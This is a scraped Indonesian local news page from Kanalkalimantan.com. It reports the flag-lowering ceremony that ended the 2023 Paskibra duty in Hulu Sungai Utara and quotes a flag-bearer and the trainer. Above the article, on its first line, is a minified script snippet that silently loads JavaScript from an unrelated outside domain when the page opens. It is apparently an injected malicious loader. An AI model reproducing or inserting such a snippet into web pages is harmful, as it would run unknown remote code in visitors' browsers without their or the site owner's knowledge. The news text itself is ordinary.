(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Tuntaskan Tugas Kibarkan Bendera, Ini Kata Paskibra HSU


KANALKALIMANTAN.COM, AMUNTAI – Upacara penurunan bendera Merah Putih yang sekaligus mengakhiri rangkaian peringatan HUT ke-78 Kemerdekaan Republik Indonesia, mengakhiri pula tugas 75 anggota Pasukan Pengibar Bendera (Paskibra) Kabupaten Hulu Sungai Utara (HSU) 2023.

Setalah pagi hari upacara penaikkan, bendera Merah Putih diturunkan oleh anggota Paskibra HSU dalam upacara penurunan di lapangan Pahlawan Amuntai, Kamis (17/08/2023) sore.

Bertindak sebagai inspektur upacara dalam upacara penurunan bendera tersebut Kapolres HSU AKBP Moch Isharyadi Fitriawan SIK.

Laudya Putri Sina, siswi MAN 2 HSU terpilih sebagai pembawa bendera pada upacara penurunan.

Baca juga: Persatukan Warga Berbagai Desa dari Balap Jukung di Aluhaluh

Selain Laudya, tiga anggota Paskibra lainnya bertugas sebagai pembentang bendera, Hitri Nopima, siswi SMKN Babirik, Muhammad Naufa siswa SMAN 1 Amuntai, dan Muhammad Andhika Agustira Dinata siswa MAN 3 HSU.

Sementara, Ipda Doni Herawan yang saat ini Pejabat Sementara (Ps) Kasubagbinops Polres HSU dipercaya menjadi komandan upacara penurunan bendera.

Salah satu anggota Paskibra HSU, Muhammad Naufa sangat bangga dan senang karena diberikan kepercayaan pelatih sebagai penggerek bendera di upacara penurunan.

Baca juga: Berusia 108 Tahun Langgar Al Hinduan Banjarmasin Dibongkar, Saksi Bisu Muktamar NU Pertama di Luar Jawa

“Bukan hal yang mudah, akan tetapi bagaimana caranya kita dapat meminimalisir grogi saat di lapangan,” bebernya.

Sementara pelatih Paskibra HSU, Aipda Rizki Amelia mengaku bersyukur dari pengibaran hingga penurunan bendera mereka bisa melaksanakan dengan lancar dan sukses.

“Kami sebagai pelatih dan pembina sangat bangga dengan mereka karena mereka bisa menunjukkan yang terbaik dan menunjukkan hasil dari latihan mereka yang sangat singkat selama 15 hari sebelumnya. Jadi kami sangat bangga dengan mereka,” ungkapnya.

Adapun persiapan Paskibra sendiri masuk karantina mulai dari 3 Agustus, kemudian mulai melakukan latihan di lapangan Pahlawan setiap hari pagi dan sore.

Baca juga: Tim Drum Band HSU Wakili Kalsel ke Pra PON Yogyakarta

“Tidak hanya fisik saja, tetapi juga melatih mental mereka bertugas tugas dengan baik,” imbuhnya.

Menurutnya, dengan waktu latihan sekitar 15 hari, sebagai pelatih ia selalu berusaha semaksimal mungkin mendidik dan melatih Paskibra dalam waktu yang singkat tersebut.

“Agar nantinya bisa melaksanakan tugas mereka, baik pengibaran bendera maupun penurunan secara maksimal dan baik,” tutupnya. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

21 menit ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

1 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

2 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

3 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

5 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

6 jam ago

This website uses cookies.